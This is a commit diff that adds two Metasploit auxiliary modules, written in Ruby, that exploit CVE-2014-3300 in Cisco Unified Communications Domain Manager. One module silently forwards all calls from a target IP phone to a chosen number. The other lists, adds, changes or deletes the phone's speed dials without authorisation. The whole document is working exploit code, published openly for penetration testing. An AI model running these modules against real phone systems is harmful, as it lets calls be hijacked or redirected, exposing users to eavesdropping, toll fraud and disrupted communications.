Land rapid7#4065, @fozavci's Cisco CUCDM auxiliary modules

jvazquez-r7 · jvazquez-r7 · commit 49f04faf3f35 · 2015-01-10T01:11:45.000-06:00
diff --git a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb
@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
+      'Description' => %q{
+        The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
+        (CDM) 10 does not properly implement access control, which allows remote attackers to
+        modify user information. This module exploits the vulnerability for configure unauthorized
+        call forwarding.
+      },
+      'Author'      => 'fozavci',
+      'References'  =>
+        [
+          ['CVE', '2014-3300'],
+          ['BID', '68331']
+        ],
+      'License'     => MSF_LICENSE,
+      'Actions'     =>
+        [
+          [ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],
+          [ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]
+        ],
+      'DefaultAction'  => 'Info'
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
+        OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
+        OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
+        OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines'])
+      ], self.class)
+  end
+
+  def run
+    case action.name.upcase
+    when 'INFO'
+      get_info
+    when 'FORWARD'
+      forward_calls
+    end
+  end
+
+  def get_info
+    uri = normalize_uri(target_uri.to_s)
+    mac = datastore["MAC"]
+
+    print_status("#{peer} - Getting fintnumbers and display names of the IP phone")
+
+    res = send_request_cgi(
+        {
+            'uri'    => normalize_uri(uri, 'showcallfwd.cgi'),
+            'method' => 'GET',
+            'vars_get' => {
+                'device' => "SEP#{mac}"
+            }
+        })
+
+    unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/
+      print_error("#{peer} - Target appears not vulnerable!")
+      print_status("#{res}")
+      return []
+    end
+
+    doc = REXML::Document.new(res.body)
+    lines = []
+    fint_numbers = []
+
+    list = doc.root.get_elements('MenuItem')
+
+    list.each do |lst|
+      xlist = lst.get_elements('Name')
+      xlist.each {|l| lines << "#{l[0]}"}
+      xlist = lst.get_elements('URL')
+      xlist.each {|l| fint_numbers << "#{l[0].to_s.split('fintnumber=')[1]}" }
+    end
+
+    lines.size.times do |i|
+      print_status("#{peer} - Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}")
+    end
+
+    fint_numbers
+  end
+
+  def forward_calls
+    # for a specific FINTNUMBER redirection
+    uri = normalize_uri(target_uri.to_s)
+    forward_to = datastore["FORWARDTO"]
+    mac = datastore["MAC"]
+
+    if datastore['FINTNUMBER']
+      fint_numbers = [datastore['FINTNUMBER']]
+    else
+      fint_numbers = get_info
+    end
+
+    if fint_numbers.empty?
+      print_error("#{peer} - FINTNUMBER required to forward calls")
+      return
+    end
+
+    fint_numbers.each do |fintnumber|
+
+      print_status("#{peer} - Sending call forward request for #{fintnumber}")
+
+      send_request_cgi(
+          {
+              'uri'    => normalize_uri(uri, 'phonecallfwd.cgi'),
+              'method' => 'GET',
+              'vars_get' => {
+                  'cfoption'     => 'CallForwardAll',
+                  'device'       => "SEP#{mac}",
+                  'ProviderName' => 'NULL',
+                  'fintnumber'   => "#{fintnumber}",
+                  'telno1'       => "#{forward_to}"
+              }
+          })
+
+      res = send_request_cgi(
+          {
+              'uri'    => normalize_uri(uri, 'showcallfwdperline.cgi'),
+              'method' => 'GET',
+              'vars_get' => {
+                  'device'     => "SEP#{mac}",
+                  'fintnumber' => "#{fintnumber}"
+              }
+          })
+
+      if res && res.body && res.body && res.body.to_s =~ /CFA/
+        print_good("#{peer} - Call forwarded successfully for #{fintnumber}")
+      else
+        print_status("#{peer} - Call forward failed.")
+      end
+    end
+  end
+
+end
diff --git a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb
@@ -0,0 +1,205 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
+      'Description'   => %q{
+        The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
+        (CDM), before version 10, doesn't implement access control properly, which allows remote
+        attackers to modify user information. This module exploits the vulnerability to make
+        unauthorized speeddial manipulations.
+      },
+      'Author'        => 'fozavci',
+      'References'    =>
+        [
+          ['CVE', '2014-3300'],
+          ['BID', '68331']
+        ],
+      'License'       => MSF_LICENSE,
+      'Actions'       =>
+        [
+          [ 'List',   { 'Description' => 'Getting the speeddials for the MAC address' } ],
+          [ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],
+          [ 'Add',    { 'Description' => 'Adding a speeddial for the MAC address' } ],
+          [ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]
+        ],
+      'DefaultAction'  => 'List'
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
+      OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
+      OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
+      OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
+      OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
+    ], self.class)
+  end
+
+  def run
+
+    case action.name.upcase
+      when 'MODIFY'
+        modify
+      when 'DELETE'
+        delete
+      when 'ADD'
+        add
+      when 'LIST'
+        list
+    end
+
+  end
+
+  def send_rcv(uri, vars_get)
+    uri = normalize_uri(target_uri.to_s, uri.to_s)
+    res = send_request_cgi(
+      {
+        'uri'    => uri,
+        'method' => 'GET',
+        'vars_get' => vars_get
+      })
+
+    if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/
+      return Exploit::CheckCode::Vulnerable, res
+    else
+      print_error("#{peer} - Target appears not vulnerable!")
+      return Exploit::CheckCode::Safe, res
+    end
+  end
+
+  def parse(res)
+    doc = REXML::Document.new(res.body)
+    names = []
+    phones = []
+
+    list = doc.root.get_elements('DirectoryEntry')
+    list.each do |lst|
+      xlist = lst.get_elements('Name')
+      xlist.each {|l| names << "#{l[0]}"}
+      xlist = lst.get_elements('Telephone')
+      xlist.each {|l| phones << "#{l[0]}" }
+    end
+
+    if names.size > 0
+      names.size.times do |i|
+        info = ''
+        info << "Position: #{names[i].split(":")[0]}, "
+        info << "Name: #{names[i].split(":")[1]}, "
+        info << "Telephone: #{phones[i]}"
+
+        print_good("#{peer} - #{info}")
+      end
+    else
+      print_status("#{peer} - No Speed Dial detected")
+    end
+  end
+
+  def list
+    mac = datastore['MAC']
+
+    print_status("#{peer} - Getting Speed Dials of the IP phone")
+    vars_get = {
+      'device' => "SEP#{mac}"
+    }
+
+    status, res = send_rcv('speeddials.cgi', vars_get)
+    parse(res) unless status == Exploit::CheckCode::Safe
+  end
+
+  def add
+    mac = datastore['MAC']
+    name = datastore['NAME']
+    position = datastore['POSITION']
+    telno = datastore['TELNO']
+
+    print_status("#{peer} - Adding Speed Dial to the IP phone")
+    vars_get = {
+      'name' => "#{name}",
+      'telno' => "#{telno}",
+      'device' => "SEP#{mac}",
+      'entry' => "#{position}",
+      'mac' => "#{mac}"
+    }
+    status, res = send_rcv('phonespeedialadd.cgi', vars_get)
+
+    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
+      print_good("#{peer} - Speed Dial #{position} is added successfully")
+    elsif res && res.body && res.body.to_s =~ /exist/
+      print_error("#{peer} - Speed Dial is exist, change the position or choose modify!")
+    else
+      print_error("#{peer} - Speed Dial couldn't add!")
+    end
+  end
+
+  def delete
+    mac = datastore['MAC']
+    position = datastore['POSITION']
+
+    print_status("#{peer} - Deleting Speed Dial of the IP phone")
+
+    vars_get = {
+      'entry' => "#{position}",
+      'device' => "SEP#{mac}"
+    }
+
+    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
+
+    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
+      print_good("#{peer} - Speed Dial #{position} is deleted successfully")
+    else
+      print_error("#{peer} - Speed Dial is not found!")
+    end
+  end
+
+  def modify
+    mac = datastore['MAC']
+    name = datastore['NAME']
+    position = datastore['POSITION']
+    telno = datastore['TELNO']
+
+    print_status("#{peer} - Deleting Speed Dial of the IP phone")
+
+    vars_get = {
+      'entry' => "#{position}",
+      'device' => "SEP#{mac}"
+    }
+
+    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
+
+    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
+      print_good("#{peer} - Speed Dial #{position} is deleted successfully")
+      print_status("#{peer} - Adding Speed Dial to the IP phone")
+
+      vars_get = {
+        'name' => "#{name}",
+        'telno' => "#{telno}",
+        'device' => "SEP#{mac}",
+        'entry' => "#{position}",
+        'mac' => "#{mac}"
+      }
+
+      status, res = send_rcv('phonespeedialadd.cgi', vars_get)
+
+      if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
+        print_good("#{peer} - Speed Dial #{position} is added successfully")
+      elsif res && res.body =~ /exist/
+        print_error("#{peer} - Speed Dial is exist, change the position or choose modify!")
+      else
+        print_error("#{peer} - Speed Dial couldn't add!")
+      end
+    else
+      print_error("#{peer} - Speed Dial is not found!")
+    end
+  end
+end
